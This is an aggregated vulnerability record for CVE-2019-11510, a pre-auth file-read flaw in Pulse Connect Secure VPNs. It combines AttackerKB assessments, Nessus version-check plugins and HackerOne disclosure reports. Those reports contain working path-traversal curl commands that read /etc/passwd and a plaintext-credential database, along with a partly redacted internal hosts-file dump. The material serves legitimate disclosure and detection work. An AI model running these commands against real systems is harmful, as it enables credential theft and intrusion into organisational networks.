ID CVE-2019-11510 Type cve Reporter cve@mitre.org Modified 2020-08-24T17:37:00
Description
In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .
{"attackerkb": [{"lastseen": "2021-05-06T15:17:47", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510"], "description": "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .\n\n \n**Recent assessments:** \n \n**dmelcher5151** at April 15, 2020 4:11pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. If not patched, likely wrecked.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**hrbrmstr** at May 12, 2020 7:55pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. If not patched, likely wrecked.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "modified": "2020-07-30T00:00:00", "id": "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "href": "https://attackerkb.com/topics/lx3Afd7fbJ/cve-2019-11510", "published": "2019-05-08T00:00:00", "type": "attackerkb", "title": "CVE-2019-11510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-06T15:18:57", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2020-8243"], "description": "A vulnerability in the Pulse Connect Secure < 9.1R8.2 admin web interface could allow an authenticated attacker to upload custom template to perform an arbitrary code execution.\n\n \n**Recent assessments:** \n \n**wvu-r7** at October 07, 2020 10:52pm UTC reported:\n\nOh dear, [another](<https://research.nccgroup.com/2020/10/06/technical-advisory-pulse-connect-secure-rce-via-template-injection-cve-2020-8243/>) Pulse Secure vuln. Let\u2019s break this down lightly.\n\nThis particular CVE can be compared to [CVE-2019-11539](<https://attackerkb.com/topics/9xmWr9M5KE/cve-2019-11539>), which is also an authenticated RCE that requires access to the admin interface. So, the fact that this requires admin interface access ([SSRF](<https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html>) notwithstanding) significantly reduces the impact of the vuln.\n\nBut wait, there\u2019s more! Why was CVE-2019-11539 such a big deal, then? We have to consider the effects of [CVE-2019-11510](<https://attackerkb.com/topics/lx3Afd7fbJ/cve-2019-11510>) in the exploit chain. We were able to leak session cookies with CVE-2019-11510, among many other things, which let us authenticate our post-auth RCE. All it takes is one info leak primitive. And short of an info leak, creds can still be compromised in other ways, such as through default creds, password spraying, or even a file in an SMB share somewhere (hopefully internal).\n\nSo, uh, yeah. Patch this. Secure your creds and don\u2019t make them `admin:admin`. Admin access alone is devastating. Don\u2019t add root RCE to it. VPN is the window into your org.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 2\n", "modified": "2020-10-08T00:00:00", "id": "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "href": "https://attackerkb.com/topics/nYer9Gnh1O/cve-2020-8243", "published": "2020-09-30T00:00:00", "type": "attackerkb", "title": "CVE-2020-8243", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-06T15:18:43", "bulletinFamily": "info", "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2020-11510", "CVE-2020-11539"], "description": "In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, the admin web interface allows an authenticated attacker to inject and execute commands.\n\n \n**Recent assessments:** \n \n**wwoolwine-r7** at May 14, 2020 5:19pm UTC reported:\n\nBeing an authenticated exploit, it\u2019s certainly of less value to an attacker. Could be used in a privilege escalation context.\n\nAssessed Attacker Value: 2 \nAssessed Attacker Value: 5**ccondon-r7** at October 25, 2020 8:30pm UTC reported:\n\nBeing an authenticated exploit, it\u2019s certainly of less value to an attacker. Could be used in a privilege escalation context.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 3\n", "modified": "2020-07-30T00:00:00", "id": "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "href": "https://attackerkb.com/topics/9xmWr9M5KE/cve-2019-11539", "published": "2019-04-26T00:00:00", "type": "attackerkb", "title": "CVE-2019-11539", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-08-01T12:07:42", "description": "According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to \n8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file \nread vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by \nrequesting a specially crafted URI, to read arbitrary files and disclose sensitive information.", "edition": 14, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2019-08-16T00:00:00", "title": "Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11510"], "modified": "2019-08-16T00:00:00", "cpe": ["cpe:/a:pulse_secure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "href": "https://www.tenable.com/plugins/nessus/127908", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(127908);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/31\");\n\n script_cve_id(\"CVE-2019-11510\");\n script_bugtraq_id(108073);\n script_xref(name:\"IAVA\", value:\"2019-A-0309-S\");\n\n script_name(english:\"Pulse Connect Secure Arbitrary File Read Vulnerability (CVE-2019-11510)\");\n script_summary(english:\"Checks Pulse Connect Secure version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an arbitrary file read vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect Secure running on the remote host is prior to \n8.1R15.1, 8.2.x < 8.2R12.1, 8.3.x < 8.3R7.1 or 9.x prior to 9.0R3.4. It is, therefore, affected by an arbitrary file \nread vulnerability due to insufficient user input validation. An unauthenticated, remote attacker can exploit this, by \nrequesting a specially crafted URI, to read arbitrary files and disclose sensitive information.\");\n # https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d23f9165\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 8.1R15.1, 8.2R12.1, 8.3R7.1, 9.0R3.4, or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11510\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Pulse Connect Secure File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/08/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulse_secure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n script_require_ports(443);\n\n exit(0);\n}\n\n# Deprecated\nexit(0, 'This plugin has been deprecated. Use pulse_connect_secure-sa-44101.nasl (plugin ID 124766) instead.');\n\ninclude('vcf.inc');\n\napp_info = vcf::get_app_info(app:'Pulse Connect Secure', port:443, webapp:TRUE);\n\nconstraints = [\n {'fixed_version' : '8.1R15.1'},\n {'min_version' : '8.2' , 'fixed_version' : '8.2R12.1'},\n {'min_version' : '8.3' , 'fixed_version' : '8.3R7.1'},\n {'min_version' : '9.0' , 'fixed_version' : '9.0R3.4'},\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-24T13:30:54", "description": "According to its self-reported version, the version of Pulse Connect\nSecure running on the remote host is affected by multiple\nvulnerabilities.\n\n - An arbitrary file read vulnerability exists in PCS. An\n unauthenticated, remote attacker can exploit this, via specially\n crafted URI, to read arbitrary files and disclose sensitive\n information. (CVE-2019-11510)\n\n - Multiple vulnerabilities are found in Ghostscript.(CVE-2018-16513\n , CVE-2018-18284, CVE-2018-15911, CVE-2018-15910, CVE-2018-15909)\n\n - A session hijacking vulnerability exists in PCS. An\n unauthenticated, remote attacker can exploit this, to perform\n actions in the user or administrator interface with the\n privileges of another user. (CVE-2019-11540)\n\n - An authentication leaks seen in users using SAML authentication\n with the reuse existing NC (Pulse) session option.\n (CVE-2019-11541)\n\n - Multiple vulnerabilities found in the admin web interface of PCS.\n (CVE-2019-11543, CVE-2019-11542, CVE-2019-11509, CVE-2019-11539)\n\n - Multiple vulnerabilities found in Network File Share (NFS) of PCS\n , allows the attacker to read/write arbitrary files on the\n affected device. (CVE-2019-11538, CVE-2019-11508)\n\n - A cross-site scripting (XSS) vulnerability exists in application\n launcher page due to improper validation of user-supplied input\n before returning it to users. An attacker can exploit this, by\n convincing a user to click a specially crafted URL, to execute\n arbitrary script code in a user's browser session.\n (CVE-2019-11507)\n\nRefer to the vendor advisory for additional information.", "edition": 16, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-10T00:00:00", "title": "Pulse Connect Secure Multiple Vulnerabilities (SA44101)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-15910", "CVE-2019-11507", "CVE-2019-11538", "CVE-2019-11509", "CVE-2019-11508", "CVE-2018-18284", "CVE-2018-15911", "CVE-2019-11542", "CVE-2019-11540", "CVE-2019-11543", "CVE-2019-11510", "CVE-2019-11541", "CVE-2018-15909", "CVE-2018-16513", "CVE-2019-11539"], "modified": "2019-05-10T00:00:00", "cpe": ["cpe:/a:pulse_secure:pulse_connect_secure"], "id": "PULSE_CONNECT_SECURE-SA-44101.NASL", "href": "https://www.tenable.com/plugins/nessus/124766", "sourceData": "#\n# (c) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124766);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/23\");\n\n script_cve_id(\n \"CVE-2018-15909\",\n \"CVE-2018-15910\",\n \"CVE-2018-15911\",\n \"CVE-2018-16513\",\n \"CVE-2018-18284\",\n \"CVE-2019-11507\",\n \"CVE-2019-11508\",\n \"CVE-2019-11509\",\n \"CVE-2019-11510\",\n \"CVE-2019-11538\",\n \"CVE-2019-11539\",\n \"CVE-2019-11540\",\n \"CVE-2019-11541\",\n \"CVE-2019-11542\",\n \"CVE-2019-11543\"\n );\n script_bugtraq_id(105122, 107451, 108073);\n script_xref(name:\"IAVA\", value:\"2019-A-0309-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0001-S\");\n\n script_name(english:\"Pulse Connect Secure Multiple Vulnerabilities (SA44101)\");\n script_summary(english:\"Checks PCS version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the version of Pulse Connect\nSecure running on the remote host is affected by multiple\nvulnerabilities.\n\n - An arbitrary file read vulnerability exists in PCS. An\n unauthenticated, remote attacker can exploit this, via specially\n crafted URI, to read arbitrary files and disclose sensitive\n information. (CVE-2019-11510)\n\n - Multiple vulnerabilities are found in Ghostscript.(CVE-2018-16513\n , CVE-2018-18284, CVE-2018-15911, CVE-2018-15910, CVE-2018-15909)\n\n - A session hijacking vulnerability exists in PCS. An\n unauthenticated, remote attacker can exploit this, to perform\n actions in the user or administrator interface with the\n privileges of another user. (CVE-2019-11540)\n\n - An authentication leaks seen in users using SAML authentication\n with the reuse existing NC (Pulse) session option.\n (CVE-2019-11541)\n\n - Multiple vulnerabilities found in the admin web interface of PCS.\n (CVE-2019-11543, CVE-2019-11542, CVE-2019-11509, CVE-2019-11539)\n\n - Multiple vulnerabilities found in Network File Share (NFS) of PCS\n , allows the attacker to read/write arbitrary files on the\n affected device. (CVE-2019-11538, CVE-2019-11508)\n\n - A cross-site scripting (XSS) vulnerability exists in application\n launcher page due to improper validation of user-supplied input\n before returning it to users. An attacker can exploit this, by\n convincing a user to click a specially crafted URL, to execute\n arbitrary script code in a user's browser session.\n (CVE-2019-11507)\n\nRefer to the vendor advisory for additional information.\");\n # https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d23f9165\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to the appropriate version referenced in the advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11540\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Pulse Connect Secure File Disclosure\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pulse Secure VPN Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:pulse_secure:pulse_connect_secure\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"pulse_connect_secure_detect.nbin\");\n script_require_keys(\"installed_sw/Pulse Connect Secure\");\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nport = get_http_port(default:443, embedded:TRUE);\napp_info = vcf::pulse_connect_secure::get_app_info(app:'Pulse Connect Secure', port:port, full_version:TRUE, webapp:TRUE);\n\nconstraints = [\n {'min_version' : '8.3.1', 'fixed_version':'8.3.7.65025', 'fixed_display' : '8.3R7.1'},\n {'min_version' : '8.2.1', 'fixed_version':'8.2.12.64003', 'fixed_display' : '8.2R12.1'},\n {'min_version' : '8.1.1', 'fixed_version':'8.1.15.59747', 'fixed_display' : '8.1R15.1'},\n {'min_version' : '9.0.1', 'fixed_version':'9.0.3.64053', 'fixed_display' : '9.0R3.4 / 9.0R4'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2020-05-07T17:56:52", "bulletinFamily": "bugbounty", "cvelist": ["CVE-2019-11510", "CVE-2019-11539"], "bounty": 0.0, "description": "**Summary:**\nThe Navy has a Pulse Secure SSL VPN (https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/auth/url_default/welcome.cgi) that is vulnerable to:\nCVE-2019-11510 - Pre-auth Arbitrary File Reading\nCVE-2019-11539 - Post-auth Command Injection\n\nvulnerable hostname from ssl certificate: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588.navy.mil\n\nThe pre-auth arbitrary file reading vulnerability (CVE-2019-11510) enables an un-authenicated user to read the file /data/runtime/mtmp/lmdb/dataa/data.mdb from the Pulse VPN device. This files contains admin and other users credentials in plain-text format. This information can be used to log into the pulse device as an administrator.\n\nOnce logged in as an administrator, the post-auth command injection vulnerability (CVE-2019-11539) allows an attacker to execute commands on the device. Commands execution could lead to compromise to other servers on the network or malware implantation.\n\nThere was a talk recently at Blackhat USA that goes into great detail of the vulnerabilities and how to exploit them.\n\nExploit code was recently released to the public for this vulnerability. I would consider this an extremely critical issue, and others will be scanning your network trying to compromise this. The Pulse Secure version can be obtained from your device via a publicly available file here (https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/nc/nc_gina_ver.txt), so it is really easy to detect for attackers.\n\nHere are links to Blackhat presentation, Pulse Secure Security Bulletin, exploit code, video of exploit code in action and example report found on twitter's network.\n\nBlackhat 2019 Presentation\nhttps://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf\n\nPulse Secure Security Bulletin\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n\nPublicly available exploit code:\nhttps://raw.githubusercontent.com/projectzeroindia/CVE-2019-11510/master/CVE-2019-11510.sh\n\nVideo of how exploit works:\nhttps://www.youtube.com/watch?v=v7JUMb70ON4&feature=youtu.be\n\nExample report found on Twitter's network\nhttps://hackerone.com/reports/591295\n\n## Impact\nCritical - I would consider this an extremely critical issue, and others will be scanning your network trying to compromise this.\n\n## Step-by-step Reproduction Instructions\n1. From macos/linux command line issue the following command;\ncurl --path-as-is -s -k \"https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/\"\n\nThis will display the /etc/passwd file from the pulse secure device. This in itself it enough to confirm the presence of both vulnerabilities.\n\nI've attached screenshots of getting the vulnerable Pulse Secure version from the device, and confirming the arbitrary file read vulnerability. I did not attempt to login into your device as administrator. Reading /etc/passwd is enough to confirm the vulnerability exists.\n\n## Product, Version, and Configuration (If applicable)\nPulse Secure 9.0.1.63949\n\n## Suggested Mitigation/Remediation Actions\nInstall updated firmware/os from the Pulse Secure Security Bulletin\nhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101\n\n## Impact\n\nAn attacker could compromise this device, and gain access to the DoD networks, compromise other servers, or implant malware.", "modified": "2020-05-07T16:57:13", "id": "H1:680480", "href": "https://hackerone.com/reports/680480", "published": "2019-08-23T15:57:54", "type": "hackerone", "title": "U.S. Dept Of Defense: Command Injection (via CVE-2019-11510 and CVE-2019-11539)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-02T20:29:48", "bulletinFamily": "bugbounty", "cvelist": ["CVE-2019-11510"], "bounty": 0.0, "description": "**Summary:**\nPulse Secure has two main vulnerabilities that allow file disclosure and post auth RCE\n**Description:**\nCVE-2019-11510 is a file disclosure due to some normalization issues in pulse secure. I was able to reproduce this by grabbing in the etc/passswd. \nhttps://$hax/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#\n\nThough the impact of that is very limited, medium to high sec at best. From here we can grab a specific file.\n\nThe file /data/runtime/mtmp/lmdb/dataa/data.mdb contains clear context passwords and usernames, when a user logs in from here we can then access the Pulse secure instance. I stopped here due to not wanting to break the rules of engagements but from here I would log in then exploit a Post auth exploit.\n\n\nHere's a list of files that an attacker would instantly hit\n/data/runtime/mtmp/system\n/data/runtime/mtmp/lmdb/dataa/data.mdb\n/data/runtime/mtmp/lmdb/dataa/lock.mdb\n/data/runtime/mtmp/lmdb/randomVal/data.mdb\n/data/runtime/mtmp/lmdb/randomVal/lock.mdb\n## Impact\nCritical \n## Step-by-step Reproduction Instructions\nWe can only do this using due to browsers messing up the exploit\n\ncurl --path-as-is -k -D- https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/#\n\n curl --path-as-is -k -D- https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/#\n\n curl --path-as-is -k -D- https://\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/#\n\n## Product, Version, and Configuration (If applicable)\nPulse Secure\n## Suggested Mitigation/Remediation Actions\nPatch pulse immediately\n\n## Impact\n\nAn attacker will be able to download internal files and specifically target a local file which stores clear text passwords when a user login. This also an attacker to access highly sensitive internal areas and even can perform command execution", "modified": "2019-12-02T19:29:23", "id": "H1:671749", "href": "https://hackerone.com/reports/671749", "published": "2019-08-12T14:34:14", "type": "hackerone", "title": "U.S. Dept Of Defense: Pulse Secure File disclosure, clear text and potential RCE", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-02T21:26:28", "bulletinFamily": "bugbounty", "cvelist": [], "bounty": 0.0, "description": "**Summary / Description:**\n\u2588\u2588\u2588\u2588\u2588 is vulnerable to Path Traversal which can lead to remote code execution.\n\n\n\n\n## Impact\nCritical\n\n## Step-by-step Reproduction Instructions\n\n1. Run the following `cURL` command to get the file `/etc/hosts`\n\n```\ncurl --path-as-is -k -D- 'https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/dana-na/../dana/html5acc/guacamole/../../../../../../etc/hosts?/dana/html5acc/guacamole/#'\n```\n\n\n```\n## File generated by DSNet::Hosts::update at Thu Aug 1 13:24:40 2019\n\n127.0.0.1\tlocalhost\n\u2588\u2588\u2588\u2588\u2588128.141\tKMPC1_Node4\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588252.82\tacrcxznxx07d-10\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588252.74\tacrcxznxx06d-10\u2588\u2588\u2588\n\u2588\u2588\u2588252.67\tODA-SCAN\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588252.65\tODA-VIP-1\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588252.63\tODA-1\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588252.196\tsubversion\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588252.134\tacrcxznxx07d-12\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588252.13\tODA-2\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588251.16\tacdeva0xxb5l010\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588251.15\tacdeva0xxb5l009\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588251.14\tacdeva0xxb5l008\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588250.239\tdevikrome\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588250.216\tws.soa\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588250.192\tac0hxzndb01d-07.rsn.aac\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588250.16\tdevccimm\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588250.112\tdevauth\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588l devauth\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588250.104\tac0hxznap02d-03\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u25881.235\tspex\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u25881.205\tauth\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u25881.164\tinternal\u2588\u2588\u2588\u2588 internal\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u25881.142\tensq\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588 ensq\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u25880.92\tac0hqa0xxa3b021.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u25880.55\tg2g\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u25880.177\tAc0hqa0xxa1b005.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u258864.181\tac0hqsmap13p\n\u2588\u2588\u2588\u258864.142\tac0hqsmxx03p\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258840.237\temmggb\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258840.126\tac0hqapxx25p.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588221.42\tgcrcknox gcrcknox\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588220.81\tft1ariss\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588220.245\tccimm\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588220.150\tensqrtn\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588220.145\tpthensqtrain\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588212.9\tacrcea0xxb5l035\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588212.64\tacrcea0xxb5l034\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u258818.60\tquestcentral questcentral\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588163.35\thrcremedy\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u258878.107\tafrissimt.rs\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u25888.61\tnetscout\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588205.203\tac0hqa0xxb5l007\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588205.202\tac0hqa0xxb5l006\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588205.200\tacrtna0xxb5l003\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588146.8\tAC0HQC2A0A3B021.RSN.AAC\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588146.7\tAC0HQC2A0A3B020.rsn.aac\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588145.91\tac0hqwsxx04p.rsn.aac\u2588\u2588\u2588\u2588\u2588\n\u2588\u2588\u2588\u2588\u2588145.149\tcaliber11.rsn.aac\u2588\u2588\u2588\u2588\u